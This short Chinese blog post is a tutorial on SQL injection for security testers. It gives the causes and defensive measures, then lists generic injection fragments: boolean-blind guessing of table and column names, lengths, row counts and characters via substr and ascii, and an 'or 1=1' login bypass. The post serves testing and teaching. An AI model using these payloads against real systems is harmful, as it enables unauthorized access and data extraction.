安全测试之sql注入

 

不管是web界面还是app,都会涉及表单输入和提交,如果程序员没有对提交的字符进行过滤或者特殊处理,很容易会产生问题,这里讲的的sql注入就是其中一种方式,在表单中输入sql语句达到进入系统的目的。

 

sql注入的原理就是上面提到的通过构造特殊的输入作为参数传入web或者app

sql注入产生原因有几个原因:

1、不当的类型处理

2、不安全的数据库配置

3、不合理的查询处理

4、不当的错误处理

5、转义字符处理不合适

6、多个提交处理不当

 

sql注入防护

1、不要相信用户的输入,对任何输入都需要做校验(比如长度,正则,等)

2、不使用动态拼接sql

3、不使用管理员权限的数据库连接(每个用户单独设置权限)

4、机密信息不直接存放,可以加密或者不直接打印

5、异常信息尽可能使用内部错误码

 

 

sql注入方法

猜表名:

and (select count(*) from 表名) <>0

and exists (select * from 表名)

猜列名:

and (select count(列名) from 表名) <> 0

and exists (select 列名 from 表名)

一般用户名为user 密码为passwd/password

猜列名长度:

and (select length(列名) from 表名) = 2

绕过身份验证:

or 1=1

猜表的条数(一般用在判断账号个数):

and 0<(select count(*) from 表名)

and 1<(select count(*) from 表名)

猜字段第一个字符:

and 1=(select count(*) from 表名 where substr(列名,1,1)='a')

若返回正常,则可继续猜第二位

and 1=(select count(*) from 表名 where substr(列名,1,2)='ab')

通过asscii码猜字符:

and 1=(select count(*) from 表名 where ascii(substr(列名,1,1))='49')

 

posted @ 2018-08-23 19:38  水里的芋头  阅读(297)  评论(0编辑  收藏  举报